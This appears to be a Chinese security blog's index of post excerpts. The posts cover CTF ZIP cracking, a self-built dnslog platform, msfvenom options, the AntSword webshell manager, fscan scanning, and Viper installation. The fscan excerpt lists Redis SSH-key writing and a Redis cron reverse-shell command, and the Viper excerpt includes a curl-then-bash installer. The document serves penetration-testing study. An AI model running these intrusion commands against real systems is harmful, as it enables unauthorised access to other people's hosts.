MISC题目中,ZIP压缩包一般会有五种破解方式 暴力 字典 明文 冗余数据 伪加密 一般来说我们可以使用ARCHPR来帮助我们破解ZIP 在得到一个压缩包的时候,我们应该先阅读属性内容,里面能给你一些解题提示 这个就提示我们要六位暴力 以下就是提示我们可能存在冗余数据 其次,我们还可能存在字典,当然啦,我们要有对应的字典才行 在打开压缩包的时候,我们可以留意一下内外压缩包的文件时候有CRC校验码相同的,如果有我们可以尝试明文破解口令。 但是我们也可以不破解口令,直接通过密钥解密文件 在处理冗余数据时,我们可以采用binwalk判断冗余数据,并且binwalk -e提取,有时候不行的话还是自己动手吧 以上四种都很好理解,伪加密我们要使用Win…
Dnslog相信渗透的都不陌生,但我只是在Apache Log4j后才意识到这东西是有多好用 但是有些时候,知名的dnslog.cn网站就会崩溃。 既然这样,干脆就自己搭一个,但是过程十分艰辛。 由于我设置了@*解析,我就不需要再对ns1.xxx.cn/ns2.xxx.cn进行解析 具体如下 然后我们就接着物色dnslog平台 一个非常古老的BugScanTeam的DNSLOG 于是乎,调了好久,6年前的代码,还要改cdn,还要改ssl(开发组历史遗留问题) 最后改完了,发现一直301,查看issue才发现要修改 SECURE_SSL_REDIRECT = False 然而,无论怎么修改数据库,还是进不去他的管理界面! 之后只好另谋出路,最后…
Metasploit一款开源安全漏洞检测工具,其不断更新的Payload使其成为了最强大的渗透框架之一 对于MSFCONSOLE(简称MSF),就不多赘述安装部署了,对于日常渗透使用一般可以再Viper中使用。 常见参数解读: -p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为payload预先指定一个NOP滑动长度 -f, –format < form…
Github仓库 蚁剑官方加载器 这是一款Webshell管理的基础软件,渗透的一切都是围绕shell进行的,内置的插件也能解决一些小问题 附一张成功webshell的截图 连接密码对应webshell的POST参数
Github仓库 Fscan是一款内网综合扫描工具,以下为常用命令 fscan -h 0.0.0.0/8 (全网段扫描) fscan -h 192.168.1.1/24 (默认使用全部模块) fscan -h 192.168.1.1/16 (B段扫描) 其他用法 fscan -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan -h 19…
前导 Viper中文炫彩蛇,为图形化的渗透平台,用户可以使用浏览器登录完成诸如(覆盖初始访问/持久化/权限提升/防御绕过/凭证访问/信息收集/横向移动等大类)操作,并提供内网隧道,文件管理,命令行等常用渗透工具。 在进行内网渗透中,还有内网网络拓扑等可视化工具提高工作效率。 安装 快捷部署有Docker和F8X一键部署两种方式 下方为f8x一件部署,推荐在全新linux环境中使用 curl -o f8x https://f8x.io/ # wget -O f8x https://f8x.io/ bash f8x -viper 我所使用的时Docker安装,并在wsl(Docker on desktop)和linux(CentOS 7)系统下都…